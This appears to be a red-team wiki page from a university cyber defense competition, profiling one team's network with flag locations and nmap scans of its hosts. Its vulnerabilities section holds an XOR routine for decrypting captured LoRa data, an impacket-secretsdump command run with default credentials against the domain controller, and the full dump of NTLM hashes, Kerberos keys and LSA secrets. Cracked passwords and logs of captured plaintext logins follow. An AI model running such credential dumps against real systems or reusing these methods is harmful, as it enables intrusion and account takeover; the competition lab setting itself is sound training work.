Team 7 Wiki Page

Signup Login
Team Information
Team System32 logo
Number
Team 7
Name
System32
IP Range
49.49.33.0/24
Domain
team7.isucdc.com
Current Place
6th
Red Teamer(s)
None
Flag Status
Blue Flags
AD C:\Windows\System32\ JD C:\Windows\System32\ LTV /etc/ NEWS /etc/ WSTN /etc/ WWW /etc/ TX Arduino LoRa x-api-key-flag
Red Flags
AD C:\Users\Administrator\ JD C:\Users\Administrator\ LTV /root/ NEWS /root/ WSTN /root WWW /root
Service Status
AD LDAP
AD RDP
JD RDP
LTV SSH
NEWS SSH
NEWS HTTP
WSTN SSH
WSTN MQTT
WWW SSH
WWW HTTP
Nmap
Uploaded Files: TEAM7
AD

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-04 14:59:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team7.isucdc.com0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: team7.isucdc.com0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=ad.team7.isucdc.com
| Not valid before: 2025-09-05T01:19:39
|_Not valid after:  2026-03-07T01:19:39
| rdp-ntlm-info: 
|   Target_Name: TEAM7
|   NetBIOS_Domain_Name: TEAM7
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team7.isucdc.com
|   DNS_Computer_Name: ad.team7.isucdc.com
|   DNS_Tree_Name: team7.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-10-04T14:59:26+00:00
|_ssl-date: 2025-10-04T14:59:35+00:00; -1s from scanner time.
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-10-04T14:59:28
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s



LTV

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 0c:7c:02:eb:5a:9f:e2:95:66:c1:1e:06:cf:84:cf:47 (DSA)
|   2048 45:37:39:b5:8f:c6:b9:78:ab:1e:41:dd:81:59:6e:cf (RSA)
|   256 89:e9:f1:4a:c8:d9:39:1f:07:8d:d4:60:3c:19:c4:dd (ECDSA)
|_  256 58:de:71:85:95:40:51:64:3b:9e:e9:9c:eb:fd:f8:38 (ED25519)
80/tcp   closed http
389/tcp  closed ldap
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NEWS

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 35:79:94:a9:8d:d5:06:f3:5b:b6:c7:31:79:62:de:08 (RSA)
|   256 95:a6:a9:0f:80:04:10:e4:8b:a0:0b:68:6b:39:07:e8 (ECDSA)
|_  256 95:78:e1:ee:dc:0e:f6:2b:a3:0d:dd:aa:e0:8f:a7:cd (ED25519)
8080/tcp open  http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:07 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:07.254+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:07 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:07.111+00:00","status":404,"error":"Not Found","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:07 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:07.146+00:00","status":404,"error":"Not Found","path":"/"}
|   RTSPRequest, Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 04 Oct 2025 15:01:07 GMT
|     Connection: close
|     HTTP Status 400 <br>|     Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 400 
|_    Request


WSTN

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 5a:18:5d:f5:ed:78:64:cc:53:87:40:4b:b6:10:86:3a (RSA)
|   256 e4:74:12:60:41:a3:53:40:67:ee:ea:da:c5:42:e3:fd (ECDSA)
|_  256 07:99:db:38:3a:fe:5a:ba:fc:5c:27:c9:ea:83:c3:c5 (ED25519)
80/tcp   closed http
389/tcp  closed ldap
443/tcp  closed https
1883/tcp open   mqtt
|_mqtt-subscribe: Connection rejected: Not Authorized
8080/tcp closed http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

WWW

PORT     STATE SERVICE                  VERSION
22/tcp   open  ssh                      OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey: 
|   256 a0:6a:89:c7:a4:b1:37:23:2d:3a:a1:24:c3:76:10:06 (ECDSA)
|_  256 a8:7c:35:3d:df:2b:92:07:2b:1e:c8:5a:8d:d3:7e:0f (ED25519)
80/tcp   open  http                     Apache httpd 2.4.65 ((Debian))
|_http-title: Arrow pointing to the left
|_http-server-header: Apache/2.4.65 (Debian)
1883/tcp open  mosquitto version 2.0.11
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/version: mosquitto version 2.0.11
|     $SYS/broker/uptime: 2055725 seconds
|     $SYS/broker/load/bytes/received/15min: 1.19
|     $SYS/broker/store/messages/bytes: 184
|     $SYS/broker/load/bytes/received/5min: 3.53
|     $SYS/broker/load/sockets/5min: 0.38
|     $SYS/broker/clients/connected: 0
|     $SYS/broker/heap/maximum: 42632
|     $SYS/broker/messages/received: 1
|     $SYS/broker/load/connections/1min: 0.91
|     $SYS/broker/load/bytes/received/1min: 16.45
|     $SYS/broker/bytes/received: 18
|     $SYS/broker/load/messages/sent/1min: 0.91
|     $SYS/broker/messages/sent: 1
|     $SYS/broker/clients/inactive: 0
|     $SYS/broker/load/connections/5min: 0.20
|     $SYS/broker/load/bytes/sent/1min: 3.65
|     $SYS/broker/load/messages/received/5min: 0.20
|     $SYS/broker/load/messages/sent/5min: 0.20
|     $SYS/broker/load/bytes/sent/5min: 0.79
|     $SYS/broker/load/messages/sent/15min: 0.07
|     $SYS/broker/clients/disconnected: 0
|     $SYS/broker/load/messages/received/1min: 0.91
|     $SYS/broker/load/sockets/15min: 0.13
|     $SYS/broker/bytes/sent: 4
|     $SYS/broker/load/sockets/1min: 1.52
|     $SYS/broker/heap/current: 40664
|     $SYS/broker/clients/active: 0
|     $SYS/broker/load/connections/15min: 0.07
|     $SYS/broker/load/messages/received/15min: 0.07
|_    $SYS/broker/load/bytes/sent/15min: 0.27
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 200 OK
|     content-type: text/html;charset=utf-8
|     x-powered-by: Nuxt
|     Date: Sat, 04 Oct 2025 14:58:58 GMT
|     Connection: close
|     @layer base {<br>|     :root {<br>|     --ui-color-primary-50: var(--color-green-50, oklch(98.2% 0.018 155.826));<br>|     --ui-color-primary-100: var(--color-green-100, oklch(96.2% 0.044 156.743));<br>|     --ui-color-primary-200: var(--color-green-200, oklch(92.5% 0.084 155.995));<br>|     --ui-color-primary-300: var(--color-green-300, oklch(87.1% 0.15 154.449));<br>|     --ui-color-primary-400: var(--color-green-400, oklch(79.2% 0.209 151.711));<br>|     --ui-color-primary-500: var(--color-green-500, oklch(72.3% 0.219 149.579));<br>|     --ui-color-primary-600: var(--color-green-600, oklch(62.7% 0.194 149.214));<br>|     --ui-color-primary-700: var(--color-green-700, oklch(<br>|   Help, NCP: <br>|     HTTP/1.1 400 Bad Request<br><div>|_    Connection: close</div><br><br><br>
Notable Vulnerabilities
def xor_decrypt(cipher_bytes):
    KEY = [0x4F, 0xA2, 0x11, 0xC3, 0x5D, 0x99, 0x20]
    plain = bytearray(cipher_bytes)
    for i in range(1, len(cipher_bytes)):
        key_index = (i - 1) % len(KEY)
        plain[i] = cipher_bytes[i] ^ KEY[key_index]
    return plain


encrypted LoRA data:
7 4D E0 5B E3 5C D 63 7B C6 47 F7 25 A8 45 0 E6

decrypted: C4dV4x1eOD

impacket-secretsdump Administrator:cdc@ad.team7.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

e6b8d40e63723c2492371d5caf57e6c2->luz251mod
9d70d99806cf8467e21b056627fd8e25->tox010fix
6a327933542c9563d4d47959d5cb04ab->vuy787juw
590f460d879bc9472839bb8d6d536e2f->vup421seb
8f23e1f25ab2e556cc574accd477060f->lex100jit
c2bf2dcca03c2b3709e9cbffb34a81b9->gic038lal
4c805f75d7fc5b051cf4ecd0709990e2->ful173faz
692830490d0f3706dd280354222b3013->wen167xol
9d2708f2c0873c38d0058177b5480bf3->mok537zud
e46d1ebf6471ee0550d6829d68df0ef2->huy800xec
8368ac202e02f714ff52b5d1d1a848bf->yal292lew


2025-10-04_11:05:05  timothy.williams, lex100jit, From: 49.10.235.154
2025-10-04_11:05:41  cdc, cdc, From: 12.110.177.1
2025-10-04_11:10:05  michelle.allen, ful173faz, From: 49.10.235.154
2025-10-04_11:15:05  amanda.garcia, gic038lal, From: 49.10.235.154
2025-10-04_11:20:05  timothy.williams, lex100jit, From: 49.10.235.154
2025-10-04_11:25:05  amanda.garcia, gic038lal, From: 49.10.235.154
2025-10-04_11:30:02  cdc, Sun2!Elm8$Cat, From:
2025-10-04_11:30:05  timothy.williams, lex100jit, From: 49.10.235.154
2025-10-04_11:35:05  amanda.garcia, gic038lal, From: 49.10.235.154
2025-10-04_11:40:05  michelle.allen, ful173faz, From: 49.10.235.154
2025-10-04_11:45:05  amanda.garcia, gic038lal, From: 49.10.235.154
2025-10-04_11:50:05  michelle.allen, ful173faz, From: 49.10.235.154




root@www:~# cat /var/log/toomanysecrets.log
2025-10-04_09:44:19  jennifer.smith, tox010fix, From: 49.10.235.154
2025-10-04_09:49:19  tina.bell, luz251mod, From: 49.10.235.154
2025-10-04_09:54:19  tina.bell, luz251mod, From: 49.10.235.154
2025-10-04_09:59:19  tina.bell, luz251mod, From: 49.10.235.154
2025-10-04_10:04:19  tina.bell, luz251mod, From: 49.10.235.154
2025-10-04_10:09:19  jennifer.smith, tox010fix, From: 49.10.235.154
2025-10-04_10:14:19  jennifer.smith, tox010fix, From: 49.10.235.154
2025-10-04_10:19:19  tina.bell, luz251mod, From: 49.10.235.154
2025-10-04_10:24:19  jennifer.smith, tox010fix, From: 49.10.235.154

2025-10-04_10:10:05  timothy.williams, lex100jit, From: 49.10.235.154
2025-10-04_10:10:45  cdc, cdc, From: 49.10.235.174
2025-10-04_10:10:54  cdc, cdc, From: 12.110.177.1
2025-10-04_10:10:55  cdc, cdc, From: 12.110.177.1
2025-10-04_10:11:42  cdc, cdc, From: 49.10.235.233
2025-10-04_10:12:06  cdc, cdc, From: 68.32.238.130
2025-10-04_10:12:32  cdc, cdc, From: 68.32.238.130
2025-10-04_10:14:55  cdc, cdc, From: 68.32.238.130
2025-10-04_10:15:05  timothy.williams, lex100jit, From: 49.10.235.154
2025-10-04_10:16:35  cdc, cdc, From: 68.32.238.130
2025-10-04_10:18:59  mejaredbrees, purple, From: 68.32.238.130
2025-10-04_10:19:37  cdc, cdc, From: 12.110.177.1
2025-10-04_10:20:05  michelle.allen, ful173faz, From: 49.10.235.154
2025-10-04_10:25:05  michelle.allen, ful173faz, From: 49.10.235.154


[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM7\AD$:aes256-cts-hmac-sha1-96:8af255f35745a97ee2d6f5bae0353551d174dcecd9a348afaddb68dee926c925
TEAM7\AD$:aes128-cts-hmac-sha1-96:12694c9ecd85f2656bfa0bee8fc41fbd
TEAM7\AD$:des-cbc-md5:a457ab6443b31957
TEAM7\AD$:plain_password_hex:59d6993e785c668b12a2870b96e411b448b1abd17d66b371ab088ed4748ece3fd07b19145d06cdf571efb28ae063245a1bcb6e01cbc88de16af16a3d287e9dc7745c5dc0ef87873482cdebc3532d1784566dd3261824aa784d53c60cdd6484b379947b4f2b32a5bc4889c2c8079f160dd0441d6e0910185a0fa81e3e424eb2bbbf993cc4029fb079dfce6b48e8cfef2ffae6604c0a0f4ad4b575fe2eeee15490bdd2e783fd671fff39a71ffcce68a8296f11b121c763ea04fbfdefbdfeb3a958dd7d9cfa73ebf4f246181778499a4f53a7d487964e7a820ea8c861e61e79786e57dbc3a4dac4553aa9053764db835f9a
TEAM7\AD$:aad3b435b51404eeaad3b435b51404ee:4d63bdfde331e37611f74f3f33859957:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY
 0000   BC CF D3 A8 51 63 0E 5C  7B 10 26 87 DF 66 09 40   ....Qc.\{.&..f.@
 0010   96 0B B5 BD FE 34 CA 80  A8 DC C9 B5 48 A6 61 F4   .....4......H.a.
 0020   7A 8A 83 37 4E E6 E1 5F  6E EB B6 DC 3A 86 59 76   z..7N.._n...:.Yv
 0030   CD 4C 47 B8 9E 98 FC 6C  3C FE 33 54 EE 37 51 73   .LG....l<.3T.7Qs
 0040   0A 66 36 4A CF 46 65 62  BF 4C C1 F7 CF 9A F8 97   .f6J.Feb.L......
 0050   36 9D 0D 0B BC 24 C9 5C  66 37 49 C3 7A 3D F1 AD   6....$.\f7I.z=..
 0060   AA B6 92 B3 E1 FF 08 7A  78 70 8F CB 31 F9 F1 A4   .......zxp..1...
 0070   86 5B 0C 5B E8 8E 2B F6  13 2F 4C 1C 1B 71 AA 39   .[.[..+../L..q.9
 0080   10 82 C7 EF AC 0E F8 C4  FE 24 BC 4C 6C 94 B4 6D   .........$.Ll..m
 0090   AC 89 D9 9E 13 59 E8 FF  A4 EC AA 46 4A A6 80 09   .....Y.....FJ...
 00a0   4A 3E 91 01 D5 75 5C 2D  7D 3D 3B 50 65 41 1C 4B   J>...u\-}=;PeA.K
 00b0   73 5B 1C 94 50 4C 79 AE  D6 B2 FC 61 56 31 3D 74   s[..PLy....aV1=t
 00c0   53 46 EA 11 31 16 35 F1  5E 2A 6B 00 DB A7 D0 31   SF..1.5.^*k....1
 00d0   5A 88 F6 79 64 41 5A 58  1B 4D D7 9B 19 1D 35 79   Z..ydAZX.M....5y
 00e0   F4 76 5C 62 86 72 1F 52  34 B0 4E E2 A1 85 32 F4   .v\b.r.R4.N...2.
 00f0   A5 AC 25 8C 22 60 E1 43  9C 4D BE 9B 02 AC A7 0A   ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM
 0000   CB 29 1A AF 7D BF E8 20  69 E8 D9 9E 40 DB 0D 6D   .)..}.. i...@..m
 0010   7D C2 53 C4 DF 55 27 23  E8 DF 5A A9 91 37 9E 38   }.S..U'#..Z..7.8
 0020   4B E2 7D B6 92 89 11 38  93 D5 08 B1 93 A3 3B EF   K.}....8......;.
 0030   8C 80 6B 25 D5 4B FE 41  1B 43 3C 43 AF 93 70 A2   ..k%.K.A.CNL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9bbce9b1c1cba15b35cd8261f3adb3f2:::
cdc:1000:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
tina.bell:1110:aad3b435b51404eeaad3b435b51404ee:e6b8d40e63723c2492371d5caf57e6c2:::
jennifer.smith:1111:aad3b435b51404eeaad3b435b51404ee:9d70d99806cf8467e21b056627fd8e25:::
rebecca.contreras:1112:aad3b435b51404eeaad3b435b51404ee:6a327933542c9563d4d47959d5cb04ab:::
samantha.little:1113:aad3b435b51404eeaad3b435b51404ee:590f460d879bc9472839bb8d6d536e2f:::
timothy.williams:1114:aad3b435b51404eeaad3b435b51404ee:8f23e1f25ab2e556cc574accd477060f:::
amanda.garcia:1115:aad3b435b51404eeaad3b435b51404ee:c2bf2dcca03c2b3709e9cbffb34a81b9:::
michelle.allen:1116:aad3b435b51404eeaad3b435b51404ee:4c805f75d7fc5b051cf4ecd0709990e2:::
gary.wallace:1117:aad3b435b51404eeaad3b435b51404ee:692830490d0f3706dd280354222b3013:::
natasha.davis:1118:aad3b435b51404eeaad3b435b51404ee:9d2708f2c0873c38d0058177b5480bf3:::
jerome.mason:1119:aad3b435b51404eeaad3b435b51404ee:e46d1ebf6471ee0550d6829d68df0ef2:::
mark.miller:1120:aad3b435b51404eeaad3b435b51404ee:8368ac202e02f714ff52b5d1d1a848bf:::
charles.combs:1121:aad3b435b51404eeaad3b435b51404ee:198101b27a24152164fe997b336787fe:::
lisa.petersen:1122:aad3b435b51404eeaad3b435b51404ee:7ff65da6324122e3311ee840892695f7:::
laura.lewis:1123:aad3b435b51404eeaad3b435b51404ee:c4cd60d0dde4a027e037eea626c4f839:::
barry.hill:1124:aad3b435b51404eeaad3b435b51404ee:99c61063f338f1dea5278c475099b91e:::
AD$:1002:aad3b435b51404eeaad3b435b51404ee:4d63bdfde331e37611f74f3f33859957:::
NEWS$:1125:aad3b435b51404eeaad3b435b51404ee:4bd9ad311af4df3a255c55fe27365139:::
JD$:1126:aad3b435b51404eeaad3b435b51404ee:62db4716e48406d960009b18db9bb424:::
LTV$:1127:aad3b435b51404eeaad3b435b51404ee:3e36aa732e432eed14cdb8367ed97bb3:::
WSTN$:1128:aad3b435b51404eeaad3b435b51404ee:49c6cb4e14959809a0a41f42d6f52023:::
WWW$:1129:aad3b435b51404eeaad3b435b51404ee:1a802b96dc5aed13a58e43626aa8c684:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:775235520bfe2a0c59cf9e17ae36ac489adde813aac224d066292bbf965ef402
Administrator:aes128-cts-hmac-sha1-96:a0dfa4c9c1dd9c6941f3b34d854b13c0
Administrator:des-cbc-md5:6d79adfe1a86ec57
krbtgt:aes256-cts-hmac-sha1-96:6bcbf8ae1b810187918f8d190e0c203b393a8886983868af49c9ea6347f76cef
krbtgt:aes128-cts-hmac-sha1-96:c0c9bcbf1ea0fe378d040c5537776b52
krbtgt:des-cbc-md5:e3081586f7cd585e
cdc:aes256-cts-hmac-sha1-96:f2d61b149492d99264742220f4161ae7e4cd642a703a750d97ba1ec0f89e4c43
cdc:aes128-cts-hmac-sha1-96:85cc82dfe44678818d19b535decfe3ef
cdc:des-cbc-md5:5152130e07a18c73
tina.bell:aes256-cts-hmac-sha1-96:1db920a7b32875e39d474adeab04167930339e35047e3676aab242a9d90de11b
tina.bell:aes128-cts-hmac-sha1-96:9b6880ddcf17c0dff53bb3d9750b3806
tina.bell:des-cbc-md5:c452ea25f46d9e3e
jennifer.smith:aes256-cts-hmac-sha1-96:829c47ccf7dc5fa7af0408798a8f1a907998cda6e297eda753aa1ef97c3ec335
jennifer.smith:aes128-cts-hmac-sha1-96:27ba76112bf007442d299e5b319ba111
jennifer.smith:des-cbc-md5:765d5ec215157c8c
rebecca.contreras:aes256-cts-hmac-sha1-96:e8add2b69d60fe2ef07cc05017c2c97ee80bbdf2c33830861086d5719f599b72
rebecca.contreras:aes128-cts-hmac-sha1-96:89e5766e2bc8f69a30d19afbbf800c38
rebecca.contreras:des-cbc-md5:f10b9ea70e5137a4
samantha.little:aes256-cts-hmac-sha1-96:b62d58bc63fc803deeb1f855ec6b6a852ab7c4de997800b9da59f25bf26e87a2
samantha.little:aes128-cts-hmac-sha1-96:b4a5b3e8a417aa3dd46af9859c528fc2
samantha.little:des-cbc-md5:25e5709d02675b67
timothy.williams:aes256-cts-hmac-sha1-96:df58a94ec9b69f66e8891a33348b72a1f87e2d9df361987fcc10175c4ebcaedd
timothy.williams:aes128-cts-hmac-sha1-96:5917dcabf1cd455d7a432b06d23c5fe8
timothy.williams:des-cbc-md5:a4bf45198ae9c4e3
amanda.garcia:aes256-cts-hmac-sha1-96:17f306a9d199adbed819fe6450182df70d04a9efab901ff454e627ed5633d1d4
amanda.garcia:aes128-cts-hmac-sha1-96:6242381440b8792022f4889727ff508a
amanda.garcia:des-cbc-md5:c76770bfc4942626
michelle.allen:aes256-cts-hmac-sha1-96:8e2dea0e089715318222bbba0cd36cda908868d9ab8196563704cdcf444d3e0e
michelle.allen:aes128-cts-hmac-sha1-96:710b6a8b48ce8ae4af177697725d5137
michelle.allen:des-cbc-md5:85d958d0e0374349
gary.wallace:aes256-cts-hmac-sha1-96:08518066143750345ec7972ccbb6b9f4de6d74ab988e6ed0b4629a3e811cd0c4
gary.wallace:aes128-cts-hmac-sha1-96:66ff24336ae7b2868215bd14cfc57791
gary.wallace:des-cbc-md5:64c464bc91b61c7c
natasha.davis:aes256-cts-hmac-sha1-96:7575fbc4639a0148b1b494c012b860960ff32dd28c8092cb752b09fc4b821efe
natasha.davis:aes128-cts-hmac-sha1-96:8446768964492dd2a6b7a98ca623b992
natasha.davis:des-cbc-md5:374391ec58738610
jerome.mason:aes256-cts-hmac-sha1-96:426cbce47e7bd4d908cce9df132e4bb8a9131b43334e8ff737b51a7a2bd449a6
jerome.mason:aes128-cts-hmac-sha1-96:6f39288e8a5f6f2f12c3a2dcf6f28823
jerome.mason:des-cbc-md5:a2c285207686c46b
mark.miller:aes256-cts-hmac-sha1-96:2fc55574a434cb6bba89722d0057a12dbf2d170d4ddf5993e940029a88957051
mark.miller:aes128-cts-hmac-sha1-96:cc9e67277d90dccc432d4f1a861ee444
mark.miller:des-cbc-md5:10a4b3299e23aec4
charles.combs:aes256-cts-hmac-sha1-96:e9374acf1e325110816150dc24a694d8574ddc372ed3522ad3fd45dd4b4fb0a6
charles.combs:aes128-cts-hmac-sha1-96:8234acece9681a2a3fa5d728e2c990d4
charles.combs:des-cbc-md5:766e382ac26e8c6d
lisa.petersen:aes256-cts-hmac-sha1-96:3eb8a22c8584fc4646780ba23a445809398566bc1626657f2231456f430ddf0b
lisa.petersen:aes128-cts-hmac-sha1-96:58455ea7819ddd8c7bbdaa0a69ab5644
lisa.petersen:des-cbc-md5:fd97ef19916e19ae
laura.lewis:aes256-cts-hmac-sha1-96:85165d514bdc1532c286657e42b9e2484c420bffaa0751582553576e64dbcce7
laura.lewis:aes128-cts-hmac-sha1-96:b4dce752c11b0a43254881a75bc7b009
laura.lewis:des-cbc-md5:dcef04f4a4f4d398
barry.hill:aes256-cts-hmac-sha1-96:6d4cc5a7ce0c6f8c787e030ebd743f480b1728dacafcf6c21611d34fd303f575
barry.hill:aes128-cts-hmac-sha1-96:b897943b4a38ccf5d07a72b48e91be29
barry.hill:des-cbc-md5:23fee932aef2da2a
AD$:aes256-cts-hmac-sha1-96:8af255f35745a97ee2d6f5bae0353551d174dcecd9a348afaddb68dee926c925
AD$:aes128-cts-hmac-sha1-96:12694c9ecd85f2656bfa0bee8fc41fbd
AD$:des-cbc-md5:d92a5dfe4cd5ea8c
NEWS$:aes256-cts-hmac-sha1-96:b8ac0bf55b337716d53a83c0b544ca6fdb30d84d157911081fd85a10fde3e151
NEWS$:aes128-cts-hmac-sha1-96:b6617d1e0768489d3650a99b1cb9aec5
NEWS$:des-cbc-md5:628cda04197615b6
JD$:aes256-cts-hmac-sha1-96:1c99acc8f4d7d643b25e329b95b505f222253426a7ffa8222b845728d5e1d8b6
JD$:aes128-cts-hmac-sha1-96:091953786a7b9c9ba50efcbf24651fd7
JD$:des-cbc-md5:13310b3b0d61ea46
LTV$:aes256-cts-hmac-sha1-96:dae2daa02f74ad3d365303020e453d073d4e6f8089a50baa6d9c3865d2473dfd
LTV$:aes128-cts-hmac-sha1-96:5b4334f845c2a1eaaacf1403edae5868
LTV$:des-cbc-md5:bf757a92f13dea94
WSTN$:aes256-cts-hmac-sha1-96:c176fc17671677bda27fce2b9326bbb74ee932118261dfd6a09d97304d828e54
WSTN$:aes128-cts-hmac-sha1-96:377f0843c32db5cfa8e0324291d88f52
WSTN$:des-cbc-md5:4c325dd04361aeb6
WWW$:aes256-cts-hmac-sha1-96:ea8cf0a429332f3ea3af5caf68714e85cdd37524577f8ab39eabffc0e52561ce
WWW$:aes128-cts-hmac-sha1-96:4f6182c788922830c224c545d6cfdabe
WWW$:des-cbc-md5:0df1dc8f8ff14c20
[*] ClearText passwords grabbed
krbtgt:CLEARTEXT:0x7fed21454fae1e9d8bdfe68b5974a09edda8eb1cb2b311df8d984bd087c0846eb626327155812d8d893825fa44a4ece6fc90186d22437e2405f502031e6364e703ac05461dac7cc2d84572f4afc03dd66489a2b20dc6f1034d1f9f2859f84d5ee28a1e8797d7bedc5d184e38b1a203a380c66c7e219ac273ad8803ed8897b78ebe7ec9d12c2befc18db28b7ff602d54dfaf8de436ce7dcf5dee70d39b3e368848a269f5f6e25ca9a6bb9ef95ed51892f92d1f2888c81880c44622c2ec3c23dc9f0d204d765326b97d9181dd43e3d5defaeeaa2d2109ee0d005c29b0ed890d9dad40ee76841f0f63eef53aebbde6a67b828944c6ffb2281b48d0ef3a6ff6a9aacab61b00364ea0e91b7876c1ba6f8eab132457cce07630ee5880aed43dd9f2f1ce9ec2358f4144116d52051f9b4a4e63a9b780500bba5cdbf9c85dc77206f388d38bf330768c4f17e2969d744163b0c84c26a7b59d41234dd33a59561eceef8a78d8b6e27a072a08272655e3707c78a4a409930870c43d02c22527957371c19528eb19aa0c972e2f8083eef2dde69a03e28d480fe7f423f9b58e7aba4b2986059da461dac8acf2d011d4163ad94a115056cc4ae6c021e2e77c0622fba865ce631d0b9b5ffc1204377de09abfc28126b50f77d040c7f04c512fab6b7d494070f3dd6aba25cab2bc927b66d2c02d6bfb508c3ee6710d613e98123d68050f066b16f
AD$:CLEARTEXT:0x59d6993e785c668b12a2870b96e411b448b1abd17d66b371ab088ed4748ece3fd07b19145d06cdf571efb28ae063245a1bcb6e01cbc88de16af16a3d287e9dc7745c5dc0ef87873482cdebc3532d1784566dd3261824aa784d53c60cdd6484b379947b4f2b32a5bc4889c2c8079f160dd0441d6e0910185a0fa81e3e424eb2bbbf993cc4029fb079dfce6b48e8cfef2ffae6604c0a0f4ad4b575fe2eeee15490bdd2e783fd671fff39a71ffcce68a8296f11b121c763ea04fbfdefbdfeb3a958dd7d9cfa73ebf4f246181778499a4f53a7d487964e7a820ea8c861e61e79786e57dbc3a4dac4553aa9053764db835f9a








Notable Defenses
Add content here...
Team Spirit Issues
Add content here...